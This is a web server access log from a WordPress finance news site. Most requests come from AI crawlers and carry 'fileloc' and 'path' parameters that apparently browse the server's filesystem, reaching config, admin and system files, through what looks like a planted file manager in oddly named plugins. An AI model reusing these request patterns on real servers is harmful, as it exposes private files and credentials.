216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Ffile%2Feditor.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Ffile HTTP/1.1" 200 13523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Favatar%2Feditor.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Favatar HTTP/1.1" 200 12797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/11/04/convicted-crypto-exchange-dictator-sam-bankman-fried-on-all-counts-of-fraud?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fcnwwcyn%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fcnwwcyn HTTP/1.1" 200 15196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblock-template.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 28932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Ftools.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 16797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fwidgets.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 13790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fwidgets-form.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 37325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/12/01/uncertainty-sparked-by-opecs-oil-cuts-what-lies-ahead?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fabotichu%2Findex.htm&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fabotichu HTTP/1.1" 200 12670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fedit-form-blocks.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 29527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpullquote%2Feditor-rtl.min.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpullquote HTTP/1.1" 200 12925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fquery%2Feditor.min.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fquery HTTP/1.1" 200 13913 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fkses.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 100093 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fms-options.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 12734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /2024/01/03/james-bay-reels-as-oceana-rejects-monaro-lithium-project?fileloc=%2F%2Fusr%2Finclude%2Fgd_errors.h&path=%2F%2Fusr%2Finclude HTTP/1.1" 200 13809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fnavigation%2Feditor.min.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fnavigation HTTP/1.1" 200 24096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fregistration.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 12726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpost-author%2Feditor.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpost-author HTTP/1.1" 200 12847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /sitemap-pt-post-p1-2023-11.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fphp.ini&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 12580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fcustomize.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 26614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:51 +0000] "GET /2023/12/01/uncertainty-sparked-by-opecs-oil-cuts-what-lies-ahead?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fzvqqmco%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fzvqqmco HTTP/1.1" 200 15196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fms-upgrade-network.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 12732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fadmin-footer.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 15891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Ftemplate.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 38098 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.198 - - [31/Oct/2025:12:23:52 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4d/subsystem/drivers/battery HTTP/1.1" 200 20900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2024/01/03/james-bay-reels-as-oceana-rejects-monaro-lithium-project?fileloc=%2F%2Fusr%2Flib64%2Flibdevmapper-event-lvm2raid.so&path=%2F%2Fusr%2Flib64 HTTP/1.1" 200 30826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fpost-template.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 89619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fload.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 74549 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/11/27/defining-moment-long-term-breadth-indicators-tested?fileloc=%2F%2Fscripts%2Finstallpostgres&path=%2F%2Fscripts HTTP/1.1" 200 19319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/11/22/profit-from-the-skyrocketing-stock-of-gap-is-now-the-time?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fzvqqmco%2Fqnsgwkzl.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fzvqqmco HTTP/1.1" 200 31783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/11/04/convicted-crypto-exchange-dictator-sam-bankman-fried-on-all-counts-of-fraud?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjhrtllt%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjhrtllt HTTP/1.1" 200 15196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/11/22/profit-from-the-skyrocketing-stock-of-gap-is-now-the-time?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjnews-breadcrumb%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjnews-breadcrumb HTTP/1.1" 200 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fclass-wp-site.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 20533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:52 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fmeta.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 81604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/11/22/profit-from-the-skyrocketing-stock-of-gap-is-now-the-time?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fwydjxdx%2Findex.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fwydjxdx HTTP/1.1" 200 32352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/11/27/defining-moment-long-term-breadth-indicators-tested?path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fcss%2Fdist%2Fpreferences HTTP/1.1" 200 19710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fcomment-template.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 126481 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/11/22/profit-from-the-skyrocketing-stock-of-gap-is-now-the-time?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fqqxxzte%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fqqxxzte HTTP/1.1" 200 15200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/11/22/profit-from-the-skyrocketing-stock-of-gap-is-now-the-time?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fhujgdkx%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fhujgdkx HTTP/1.1" 200 15196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fversion.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 13641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Ffreeform%2Feditor.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Ffreeform HTTP/1.1" 200 23480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fnav-menu-template.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 41124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:53 +0000] "GET /?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fthemes%2Fjnews%2Fsidebar-shop.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fthemes%2Fjnews HTTP/1.1" 200 14003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /sitemap-pt-post-p1-2023-11.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fproduct.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html HTTP/1.1" 200 14794 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fclass-wp-role.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 15060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Ftheme-previews.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 15578 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 134433 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpage-list%2Feditor-rtl.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpage-list HTTP/1.1" 200 13952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /2024/01/03/james-bay-reels-as-oceana-rejects-monaro-lithium-project?fileloc=%2Fhome%2Fdailygoldindex%2Fwww%2Fwp-includes%2Fclass-wp-block-editor-context.php&path=%2Fhome%2Fdailygoldindex%2Fwww%2Fwp-includes HTTP/1.1" 200 13937 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fms-users.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 12718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fms-edit.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 12708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /2023/11/04/convicted-crypto-exchange-dictator-sam-bankman-fried-on-all-counts-of-fraud?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fcnwwcyn%2Fphp.ini&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fcnwwcyn HTTP/1.1" 200 12770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fcomment-template%2Fstyle-rtl.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fcomment-template HTTP/1.1" 200 13194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:54 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpost-excerpt%2Feditor-rtl.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpost-excerpt HTTP/1.1" 200 12773 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fpost-thumbnail-template.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 23782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/11/27/defining-moment-long-term-breadth-indicators-tested?fileloc=%2F%2Fscripts%2Fsetpostgresconfig&path=%2F%2Fscripts HTTP/1.1" 200 18946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fsetup-config.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 35153 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fuser-edit.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 64174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fcolumns%2Feditor.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fcolumns HTTP/1.1" 200 12829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Foption.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 123404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Flink-add.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 13587 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fms-site.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 57285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fdate.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 12928 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
